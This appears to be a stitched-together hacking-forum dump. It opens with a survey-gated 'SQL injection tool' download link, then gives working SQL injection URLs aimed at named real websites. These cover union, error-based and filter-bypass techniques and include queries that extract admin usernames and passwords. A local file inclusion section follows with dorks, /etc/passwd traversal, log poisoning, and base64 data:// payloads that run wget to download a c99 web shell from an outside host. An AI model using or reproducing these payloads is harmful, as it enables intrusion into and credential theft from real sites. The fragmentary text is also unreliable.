SQL injection tool
It is my handwork so you need to fill up survey to get it.
Download Link :
http://adfoc.us/1834641
http://www.goavenues.com/list_itinerary.php?id=-4%20union%20%28select%201,2,version%28%29,4,5,6,7,8%29%20--
http://www.goavenues.com/list_itinerary.php?id=-4%20union%23aa%0Aselect%201,2,version%28%29,4,5,6,7,8%20--
http://www.goavenues.com/list_itinerary.php?id=-4%20/**/union/*!50000select*/%201,2,version%28%29,4,5,6,7,8%20--
http://www.goavenues.com/list_itinerary.php?id=-4%20/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/%201,2,version%28%29,4,5,6,7,8%20--
http://www.westbury.com/article.php?article_id=-117%20union%20select%201,2,unhex%28hex%28Concat%28Column_Name,0x3e,Table_schema, 0x3e,table_Name%29%29%29,4,5,6,7/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char%2837,%20112,%2097,%20115,%20115,%2037%29--
www.westbury.com/article.php?article_id=-117 union select 1,2,convert(group_concat(table_name) using ascii),4,5,6,7+from+information_schema.tables --
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
utf8
concat(0x223e3c62723e,,0x3c696d67207372633d22)
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+
http://www.lermitagehotel.ee/?pageid=160 +and+(select+1+from+(select+count(*),concat((select(select+concat(concat(user_na me,0x3a,user_pass),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+informat ion_schema.tables+group+by+x)a)
And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(column1,0x3a,column2),1,150)
from table where table_schema like database()),0x3a,floor(rand(0)*2))x
from information_schema.tables group by x)z)-- -
http://www.lermitagehotel.ee/?pageid=160 And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(table_name),1,150)from information_schema.tables where table_schema like database()),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)z)-- -
Quote:Duplicate entry ':admin_topmenu,album_photos,albums,defaults,form_items,form_log,' for key 'group_key'
or 1 group by concat_ws(0x3a,(select substr(group_concat(column),1,150)
from table),floor(rand(0)*2)) having min(0) or 1-- -
and updatexml(0,concat(0x3a,(select substr(group_concat(column),1,150)
from table)),0)-- -
II) Using concat() and group_concat()
==
and updatexml(0,concat(0x3a,(select concat(0x3a,group_concat(column))
from table)),0)-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=cast(@@version as int)
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=convert(int,db_name())
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 1-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 10-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,@@version,3,4,5,6,7,8,9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,user_name(),3,4,5,6,7,8,9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(),3,4,5,6,7,8,9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(1),3,4,5,6,7,8,9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(11),3,4,5,6,7,8,9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,schema_name,3,4,5,6,7,8,9 from information_Schema.schemata-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46
UNION all SELECT 1,table_name,3,4,5,6,7,8,9 from
information_Schema.tables where table_schema!=db_name()-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46
UNION all SELECT 1,column_name,3,4,5,6,7,8,9 from
information_Schema.columns where table_name='o_adminmst'-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,username,3,4,5,6,7,8,9 from o_adminmst-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,password,3,4,5,6,7,8,9 from o_adminmst-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT null,null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,@@version),null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(@@version as int),null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(user_name() as int),null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(db_name() as int),null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 table_name from
information_schema.tables where table_schema!=db_name()))
,null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 table_name from
information_schema.tables where table_schema!=db_name() and
table_name<>'o_updatemst'))
,null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 column_name from
information_schema.columns where table_name='o_adminmst'))
,null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 column_name from
information_schema.columns where table_name='o_adminmst' and
column_name<>'adminid'))
,null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 username from o_adminmst))
,null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 password from o_adminmst))
,null,null,null,null,null,null,null,null-- -
http://ogis.edu.in/ViewPhoto.aspx?gid=46
UNION all SELECT convert(int,(select top 1 username%2b'/'%2bpassword
from o_adminmst)) ,null,null,null,null,null,null,null,null-- -
LFI stands for Local File
Inclusion. LFI is a type of web-application security vulnerability. LFI
is only one of many web-application security vulnerabilities.
Web-applications is applications(in other words: pages/websites) you can
view and interact with in your web browser.
<?php
$page = $_GET[page];
include(include($page);?>
inurl:index.php?page=index.php
inurl:index.php?page=sitemap.php
inurl:index.php?page=awards.php
inurl:index.php?page=book.php
inurl:index.php?page=store.php
inurl:index.php?page=items.php
inurl:index.php?page=feedback.php
inurl:index.php?page=welcome.php
inurl:index.php?page=advertise.php
inurl:index.php?page=festival.php
inurl:index.php?page=band.php
inurl:index.php?page=musicians.php
inurl:index.php?page=artist.php
inurl:index.php?page=archive.php
inurl:index.php?page=facilities.php
inurl:index.php?page=activies.php
inurl:index.php?page=bio.php
inurl:index.php?page=biography.php
inurl:index.php?page=menu.php
inurl:index.php?page=profile.php
inurl:index.php?page=terms.php
inurl:index.php?page=tos.php
inurl:index.php?page=screenshots.php
inurl:index.php?page=plans.php
inurl:index.php?page=templates.php
inurl:index.php?page=browse.php
inurl:index.php?page=shows.php
inurl:index.php?page=dining.php
inurl:index.php?page=media.php
inurl:index.php?page=offers.php
inurl:index.php?page=photogallery.php
inurl:index.php?page=schools.php
inurl:index.php?page=rates.php
inurl:index.php?page=buy.php
inurl:index.php?page=pricing.php
inurl:index.php?page=web.php
inurl:index.php?page=cms.php
inurl:index.php?page=sponsors.php
inurl:index.php?page=login.php
inurl:index.php?page=admin.php
inurl:index.php?page=register.php
inurl:index.php?page=signin.php
inurl:index.php?page=signup.php
inurl:index.php?page=artikel.php
inurl:index.php?page=kontakt.php
inurl:index.php?page=directions.php
inurl:index.php?page=farm.php
inurl:index.php?page=resume.php
inurl:index.php?page=products.php
inurl:index.php?page=music.php
inurl:index.php?page=agenda.php
inurl:index.php?page=faculty.php
inurl:index.php?page=overview.php
inurl:index.php?page=research.php
inurl:index.php?page=publications.php
inurl:index.php?page=outreach.php
inurl:index.php?page=education.php
inurl:index.php?page=regulatoins.php
www.site.com/index.php?page=/etc/passwd
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
www.site.com/index.php?page=/proc/self/environ
<?php phpinfo();?>
<?exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php');?>
http://www.site.com/shell.php
www.site.com/index.php?page=shell.php
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access. log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_l og
/usr/local/apache/logs/error.l og
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
http://www.site.com/index.php?page=/var/www/logs/access.log
11.11.11.11 – - [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1″ 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – - [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1″ 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11″
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1″ 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – - [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164″ – “” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
<? Php echo ‘test’;?>
11.11.11.11 – - [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1″ 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – - [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1″ 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11″
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1″ 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – - [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164″ – “” test ”
<?exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php');?>
http://www.site.com/shell.php
www.site.com/index.php?page=shell.php
http://site.com/index.php?file=php://filter/convert.base64-encode/resource=index
http://www.site.com/index.php?page=data:,?&cmd=whoami
http://www.site.com/index.php?page=data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami
<? exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php'); ?>
PD8gZXhlYyhcJ3dnZXQgaHR0cDovL3d3dy50ZWt0YW8uY29tLmNuL2ZpbGVzL2M5OS50eHQgLU8gc2hlbGwucGhwXCcpOyA/Pg==
http://www.site.com/index.php?page=
data:;base64,PD8gZXhlYyhcJ3dnZXQgaHR0cDovL3d3dy50ZWt0YW8uY29tLmNuL2ZpbGVzL2M5OS50eHQgLU8gc2hlbGwucGhwXCcpOyA/Pg==
http://www.site.com/shell.php
http://www.site.com/index.php?page=shell.php
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,banner,null,null,null,null%20from%
20v$version
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--output=WWWTARANTO
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,global_name,NULL,NULL,NULL,NULL from global_name-- -
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null union select null,table_name,null,null,null,null from (select ROWNUM r,table_name from all_tables order by table_name) where r=130This will get table number 130...Change r to get table number
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,column_name,null,null,null,null%20
from%20%28select%20ROWNUM%20r,column_name%20from%20all_tab_columns%20where%20tab
le_name=%27RESULT$%27%29%20where%20r=3
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS--
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) ||
CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) ||
CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--
CHR(68) || CHR(65) || CHR(84) ||
CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) ||
CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) =
DATA_ESECUZIONE
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) ||
CHR(65) || CHR(76) || CHR(66) || CHR(79)--
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from
USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) ||
CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) ||
CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) ||
CHR(73) || CHR(79) || CHR(78) || CHR(69)--
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122
union select
NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from
TB_UTENTE--
www.site.com/artist.php?i=36
www.site.com/artist.php?i=36'
www.site.com/artist.php?i=36 order by 10-- no error
www.site.com/artist.php?i=36 order by 20-- no error
www.site.com/artist.php?i=36 order by 50-- no error
www.site.com/artist.php?i=36 order by 100-- no error
www.site.com/artist.php?i=36' order by 100--+
www.site.com/artist.php?i=36' order by 10--+ erro
www.site.com/artist.php?i=36' order by 8--+ error
www.site.com/artist.php?i=36' order by 6--+ error
www.site.com/artist.php?i=36' order by 5--+ no error
www.site.com/artist.php?i=36' union select 1,2,3,4,5--+
www.site.com/artist.php?i=36' and 1=1--+ its true not get error from this
www.site.com/artist.php?i=36' and 1=2--+ its false and steal no erro
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
http://www.site.com/artist.php?i=36'
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+[code]
[spoiler][img]http://img830.imageshack.us/img830/2218/81406053.png[/img]
0x7e,0x27
http://www.site.com/artist.php?i=36'
and(select 1 from(select count(*),concat((select (select
concat(version())) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and
1=1--+
http://www.kusuri.co.uk/view_product.php?id=242
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or
http://www.kusuri.co.uk/view_product.php?id=242
or 1 group by
concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having
min(0) or 1--+
and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,concat(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
limit 0,1 for first exicting things
limit 1,1 for two exicting things
.
.
.
limit N,1 for N exicting things
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name}
0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name}
0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273
0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273
0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1--+
id,username,password,firstname,email
http://www.site.com/artist.php?i=36' and+(select 1 from(select+count(*),concat((select+concat(username,0x3a,password,0x3a,email) from mass_users+limit+0,1),floor(rand(0)*2))x
from information_schema.tables+group by x)a) and 1=1--+